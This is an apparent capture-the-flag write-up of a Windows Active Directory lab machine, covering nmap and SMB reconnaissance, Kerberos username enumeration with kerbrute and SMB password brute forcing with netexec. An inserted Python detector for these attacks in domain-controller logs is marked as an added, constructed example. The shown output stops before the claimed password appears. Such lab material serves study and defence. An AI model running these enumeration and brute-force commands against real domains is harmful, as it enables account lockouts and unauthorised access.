CHANGE MACHINE

CHANGE 

First of all, we need to locate the Active Directory host. We use arp-scan to discover the active hosts on the local network, identifying 192.168.88.8 as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1	d8:44:89:50:2d:a3	(Unknown)
192.168.88.4	00:e0:4c:97:01:a7	(Unknown)
192.168.88.5	00:d8:61:fa:c0:4a	(Unknown)
192.168.88.7	08:00:27:b1:ae:9f	(Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded
Now we run nmap against this host, 192.168.88.7, to identify the open ports and service versions, as you can see below.
Key open ports and services include:
  • 53/tcp: Simple DNS Plus (likely acting as a DNS server for the domain)

  • 88/tcp: Microsoft Windows Kerberos (essential for Active Directory authentication)

  • 135/tcp: Microsoft Windows RPC

  • 139/tcp: Microsoft Windows netbios-ssn

  • 389/tcp: Microsoft Windows Active Directory LDAP (for directory services)

  • 445/tcp: Microsoft Windows SMB (for file sharing and other services)

  • 464/tcp: kpasswd5? (Kerberos password change protocol)

  • 593/tcp: Microsoft Windows RPC over HTTP 1.0

  • 636/tcp: tcpwrapped (LDAP over SSL)

  • 3268/tcp: Microsoft Windows Active Directory LDAP (Global Catalog)

  • 3269/tcp: tcpwrapped (Global Catalog LDAP over SSL)

  • 5985/tcp: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

  • 9389/tcp: .NET Message Framing

  • 47001/tcp, 49664-49711/tcp: Various Microsoft Windows RPC and RPC over HTTP ports

The nmap output also confirms the OS: Windows and CPE: cpe:/o:microsoft:windows.
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -sC 192.168.88.7 -vvv -sS
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 11:05 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Initiating ARP Ping Scan at 11:05
Scanning 192.168.88.7 [1 port]
Completed ARP Ping Scan at 11:05, 0.12s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:05
Scanning 192.168.88.7 [65535 ports]
Discovered open port 53/tcp on 192.168.88.7
Discovered open port 445/tcp on 192.168.88.7
Discovered open port 139/tcp on 192.168.88.7
Discovered open port 135/tcp on 192.168.88.7
Discovered open port 49681/tcp on 192.168.88.7
Discovered open port 593/tcp on 192.168.88.7
Discovered open port 47001/tcp on 192.168.88.7
Discovered open port 49697/tcp on 192.168.88.7
Discovered open port 49666/tcp on 192.168.88.7
Discovered open port 49664/tcp on 192.168.88.7
Discovered open port 49711/tcp on 192.168.88.7
Discovered open port 49676/tcp on 192.168.88.7
Discovered open port 49688/tcp on 192.168.88.7
Discovered open port 49665/tcp on 192.168.88.7
Discovered open port 389/tcp on 192.168.88.7
Discovered open port 3269/tcp on 192.168.88.7
Discovered open port 636/tcp on 192.168.88.7
Discovered open port 49680/tcp on 192.168.88.7
Discovered open port 5985/tcp on 192.168.88.7
Discovered open port 49667/tcp on 192.168.88.7
Discovered open port 49673/tcp on 192.168.88.7
Discovered open port 49677/tcp on 192.168.88.7
Discovered open port 88/tcp on 192.168.88.7
Discovered open port 3268/tcp on 192.168.88.7
Discovered open port 464/tcp on 192.168.88.7
Discovered open port 9389/tcp on 192.168.88.7
Completed SYN Stealth Scan at 11:05, 15.06s elapsed (65535 total ports)
Initiating Service scan at 11:05
Scanning 26 services on 192.168.88.7
Service scan Timing: About 61.54% done; ETC: 11:07 (0:00:34 remaining)
Completed Service scan at 11:06, 59.62s elapsed (26 services on 1 host)
NSE: Script scanning 192.168.88.7.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 8.61s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.22s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.01s elapsed
Nmap scan report for 192.168.88.7
Host is up, received arp-response (0.00072s latency).
Scanned at 2025-06-28 11:05:25 CEST for 84s
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 128 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-28 19:05:58Z)
135/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 128
464/tcp   open  kpasswd5?     syn-ack ttl 128
593/tcp   open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 128
3268/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 128
5985/tcp  open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 128 .NET Message Framing
47001/tcp open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49676/tcp open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49680/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49688/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49697/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49711/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:B1:AE:9F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: CHANGE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-28T19:06:52
|_  start_date: N/A
|_clock-skew: 10h00m10s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 21068/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 21479/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 14035/udp): CLEAN (Timeout)
|   Check 4 (port 26386/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: CHANGE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b1:ae:9f (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   CHANGE<20>           Flags: <unique><active>
|   CHANGE<00>           Flags: <unique><active>
|   MEGACHANGE<00>       Flags: <group><active>
|   MEGACHANGE<1c>       Flags: <group><active>
|   MEGACHANGE<1b>       Flags: <unique><active>
| Statistics:
|   08:00:27:b1:ae:9f:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.66 seconds
           Raw packets sent: 75084 (3.304MB) | Rcvd: 65536 (2.622MB)
Now we add the domain, megachange.nyx, to the hosts file, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# nano /etc/hosts
  GNU nano 8.4                    /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.88.7 megachange.nyx

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Since the SMB port (445) is open, we try enumerating SMB with the command below, which reveals the OS and Windows version.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "" -p ""
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating missing folder logs/sam
[*] Creating missing folder logs/lsa
[*] Creating missing folder logs/ntds
[*] Creating missing folder logs/dpapi
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing SSH protocol database
[*] Initializing NFS protocol database
[*] Initializing WMI protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing WINRM protocol database
[*] Initializing FTP protocol database
[*] Initializing SMB protocol database
[*] Initializing VNC protocol database
[*] Copying default configuration file
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\:
In addition, we try smbmap to see whether any share information is accessible anonymously, but as you can see below this command returns nothing:
  • smbmap -H 192.168.88.7 -u '' -p ''

┌──(root㉿kali)-[/home/luis]
└─# smbmap -H 192.168.88.7 -u '' -p ''
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...
[*] Detected 1 hosts serving SMB
[|] Authenticating...
[/] Authenticating...
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 192.168.88.7, no fun for you...
[-] Closing connections..
[\] Closing connections..
[|] Closing connections..
[/] Closing connections..
[-] Closing connections..
[*] Closed 1 connections
Now, we try listing the SMB shares with smbclient instead, using the command below:
  • smbclient -NL //192.168.88.7
┌──(root㉿kali)-[/home/luis]
└─# smbclient -NL //192.168.88.7
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.88.7 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
In addition, Kerberos (port 88) is open, and it can give us critical information such as valid usernames. For this we use the kerbrute toolkit, downloading the release binary with wget as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
--2025-06-28 11:27:11--  https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
Resolviendo github.com (github.com)... 140.82.121.4
Conectando con github.com (github.com)[140.82.121.4]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://objects.githubusercontent.com/github-production-release-asset-2e65be/168977645/e8ae4080-1eb1-11ea-8fea-0ea168fa4c79?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250628%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250628T092725Z&X-Amz-Expires=1800&X-Amz-Signature=47d454f6c7972562a681e9bd207bbb2e6d83ad7a72d02168788fecdfbe543b13&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dkerbrute_linux_amd64&response-content-type=application%2Foctet-stream [siguiendo]
--2025-06-28 11:27:12--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/168977645/e8ae4080-1eb1-11ea-8fea-0ea168fa4c79?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250628%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250628T092725Z&X-Amz-Expires=1800&X-Amz-Signature=47d454f6c7972562a681e9bd207bbb2e6d83ad7a72d02168788fecdfbe543b13&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dkerbrute_linux_amd64&response-content-type=application%2Foctet-stream
Resolviendo objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
Conectando con objects.githubusercontent.com (objects.githubusercontent.com)[185.199.110.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 8286607 (7,9M) [application/octet-stream]
Grabando a: «kerbrute_linux_amd64»

kerbrute_linux_amd64       100%[========================================>]   7,90M  --.-KB/s    en 0,1s    

2025-06-28 11:27:12 (54,3 MB/s) - «kerbrute_linux_amd64» guardado [8286607/8286607]
Now we make the binary executable with the command below.
┌──(root㉿kali)-[/home/luis]
└─# chmod +x kerbrute_linux_amd64 
                                                                                                            
Next, we check the tool's parameters with -h, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ./kerbrute_linux_amd64 -h

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/28/25 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

Use "kerbrute [command] --help" for more information about a command.

┌──(root㉿kali)-[/home/luis]
└─# ./kerbrute_linux_amd64 userenum -d megachange.nyx --dc megachange.nyx xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/28/25 - Ronnie Flathers @ropnop

2025/06/28 11:35:14 >  Using KDC(s):
2025/06/28 11:35:14 >  megachange.nyx:88

2025/06/28 11:35:14 >  [+] VALID USERNAME:	 alfredo@megachange.nyx
2025/06/28 11:35:14 >  [+] VALID USERNAME:	 administrator@megachange.nyx
2025/06/28 11:35:15 >  [+] VALID USERNAME:	 change@megachange.nyx
2025/06/28 11:35:19 >  [+] VALID USERNAME:	 Administrator@megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 Alfredo@megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 sysadmin@megachange.nyx
2025/06/28 11:35:25 >  [+] VALID USERNAME:	 Change@megachange.nyx

Now we create a user list for the brute-force attempt; the file is users.txt.
┌──(root㉿kali)-[/home/luis]
└─# nano users.txt
  GNU nano 8.4                    users.txt
2025/06/28 11:35:14 >  [+] VALID USERNAME:	 alfredo@megachange.nyx
2025/06/28 11:35:14 >  [+] VALID USERNAME:	 administrator@megachange.nyx
2025/06/28 11:35:15 >  [+] VALID USERNAME:	 change@megachange.nyx
2025/06/28 11:35:19 >  [+] VALID USERNAME:	 Administrator@megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 Alfredo@megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 sysadmin@megachange.nyx
2025/06/28 11:35:25 >  [+] VALID USERNAME:	 Change@megachange.nyx
But we need to strip the domain suffix from these lines. First we replace the @ with a space using tr, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# cat users.txt | tr "@" " " 
2025/06/28 11:35:14 >  [+] VALID USERNAME:	 alfredo megachange.nyx
2025/06/28 11:35:14 >  [+] VALID USERNAME:	 administrator megachange.nyx
2025/06/28 11:35:15 >  [+] VALID USERNAME:	 change megachange.nyx
2025/06/28 11:35:19 >  [+] VALID USERNAME:	 Administrator megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 Alfredo megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 sysadmin megachange.nyx
2025/06/28 11:35:25 >  [+] VALID USERNAME:	 Change megachange.nyx

Then we extend the pipeline with awk to print only field $7, which is the bare username, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# cat users.txt | tr "@" " "| awk '{print$7}'
alfredo
administrator
change
Administrator
Alfredo
sysadmin
Change
And then we redirect the output to a text file named usuarios1.txt.
┌──(root㉿kali)-[/home/luis]
└─# cat users.txt | tr "@" " "| awk '{print$7}'> usuarios1.txt
┌──(root㉿kali)-[/home/luis]
└─# cat usuarios1.txt                                         
alfredo
administrator
change
Administrator
Alfredo
sysadmin
Change
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "usuarios1.txt" -p "usuarios1.txt" 
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:change STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:change STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:Alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:Alfredo STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:Alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:Alfredo STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:Alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:Alfredo STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:Alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:sysadmin STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:sysadmin STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:Change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:Change STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:Change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:Change STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:Change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:Change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:Change STATUS_LOGON_FAILURE
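From the defender's side, the two steps above (kerbrute's userenum and the netexec SMB brute force) leave a distinctive trail on the domain controller: a burst of Event ID 4768 failures with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for names that do not exist, followed by a burst of Event ID 4625 failures with status 0xC000006D (STATUS_LOGON_FAILURE, the same code netexec prints) spread across many accounts from one client. The Python detector below is an added example, not part of this write-up; the key=value log format and the sample events are constructed, and the thresholds and 60-second window are assumptions to tune per environment.

```python
"""Flag Kerberos username enumeration and SMB password spraying in DC logs.

Added example (not from the write-up). Input is a constructed, simplified
key=value export of Windows Security events, not Windows' native XML schema:
  4768 Status=0x6          TGT request for a name the KDC does not know
                           (KDC_ERR_C_PRINCIPAL_UNKNOWN): what kerbrute
                           userenum produces for every invalid guess
  4625 Status=0xC000006D   failed logon, STATUS_LOGON_FAILURE: what the
                           netexec SMB brute force produces per attempt
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. 192.168.88.6 is the scanning host from the write-up;
# 192.168.88.5 stands for an ordinary workstation with one mistyped name and
# one failed logon, which must not raise an alert.
SAMPLE_EVENTS = """\
2025-06-28T19:05:58Z EventID=4768 Account=aaron Client=192.168.88.6 Status=0x6
2025-06-28T19:05:58Z EventID=4768 Account=abbey Client=192.168.88.6 Status=0x6
2025-06-28T19:05:59Z EventID=4768 Account=abc Client=192.168.88.6 Status=0x6
2025-06-28T19:06:00Z EventID=4768 Account=abdul Client=192.168.88.6 Status=0x6
2025-06-28T19:06:01Z EventID=4768 Account=abel Client=192.168.88.6 Status=0x6
2025-06-28T19:06:02Z EventID=4768 Account=abigail Client=192.168.88.6 Status=0x6
2025-06-28T19:06:03Z EventID=4768 Account=alfredo Client=192.168.88.5 Status=0x0
2025-06-28T19:06:10Z EventID=4768 Account=alfreod Client=192.168.88.5 Status=0x6
2025-06-28T19:40:00Z EventID=4625 Account=alfredo Client=192.168.88.6 Status=0xC000006D
2025-06-28T19:40:00Z EventID=4625 Account=administrator Client=192.168.88.6 Status=0xC000006D
2025-06-28T19:40:01Z EventID=4625 Account=change Client=192.168.88.6 Status=0xC000006D
2025-06-28T19:40:01Z EventID=4625 Account=Administrator Client=192.168.88.6 Status=0xC000006D
2025-06-28T19:40:02Z EventID=4625 Account=sysadmin Client=192.168.88.6 Status=0xC000006D
2025-06-28T19:40:02Z EventID=4625 Account=Change Client=192.168.88.6 Status=0xC000006D
2025-06-28T19:41:30Z EventID=4625 Account=alfredo Client=192.168.88.5 Status=0xC000006D
2025-06-28T20:30:00Z EventID=4768 Account=zed Client=192.168.88.6 Status=0x6
"""


def parse_events(text):
    """Yield one dict per non-empty line: parsed 'ts' plus the key=value fields."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts_str, *fields = line.split()
        event = {"ts": datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")}
        for field in fields:
            key, _, value = field.partition("=")
            event[key] = value
        yield event


def max_distinct_in_window(events, window):
    """Largest number of distinct accounts seen inside any sliding time window.

    events: list of (timestamp, account) for a single client; order is free.
    """
    events = sorted(events)
    counts = defaultdict(int)
    left = best = 0
    for ts, account in events:
        counts[account] += 1
        # Evict events that fell out of the window ending at ts.
        while ts - events[left][0] > window:
            old = events[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best


def detect(log_text, window=timedelta(seconds=60), enum_threshold=5, spray_threshold=3):
    """Return sorted (alert_name, client_ip, distinct_accounts) tuples.

    Account names are lower-cased because AD logons are case-insensitive:
    'Alfredo' and 'alfredo' are the same account (kerbrute reported both
    spellings), so a spray counter must not count them twice.
    """
    kerberos = defaultdict(list)  # client -> [(ts, account)] unknown-principal failures
    smb = defaultdict(list)       # client -> [(ts, account)] failed logons
    for ev in parse_events(log_text):
        key = (ev["ts"], ev["Account"].lower())
        if ev["EventID"] == "4768" and ev["Status"].lower() == "0x6":
            kerberos[ev["Client"]].append(key)
        elif ev["EventID"] == "4625" and ev["Status"].lower() == "0xc000006d":
            smb[ev["Client"]].append(key)

    alerts = []
    for client, evs in kerberos.items():
        n = max_distinct_in_window(evs, window)
        if n >= enum_threshold:
            alerts.append(("kerberos_user_enumeration", client, n))
    for client, evs in smb.items():
        n = max_distinct_in_window(evs, window)
        if n >= spray_threshold:
            alerts.append(("smb_password_spray", client, n))
    return sorted(alerts)


if __name__ == "__main__":
    for alert, client, n in detect(SAMPLE_EVENTS):
        print(f"{alert}: {client} touched {n} distinct accounts within one window")
```

On the constructed sample the scanner's late 20:30 probe falls outside the window and is not counted, while the duplicate Administrator/Change spellings collapse to four distinct accounts.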

Now, by brute-forcing with the rockyou wordlist, we discover the password, which is Password1, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "usuarios1.txt" -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:123456 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:123456 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:12345 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:12345 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:12345 STATUS_LOGON_FAILURE 
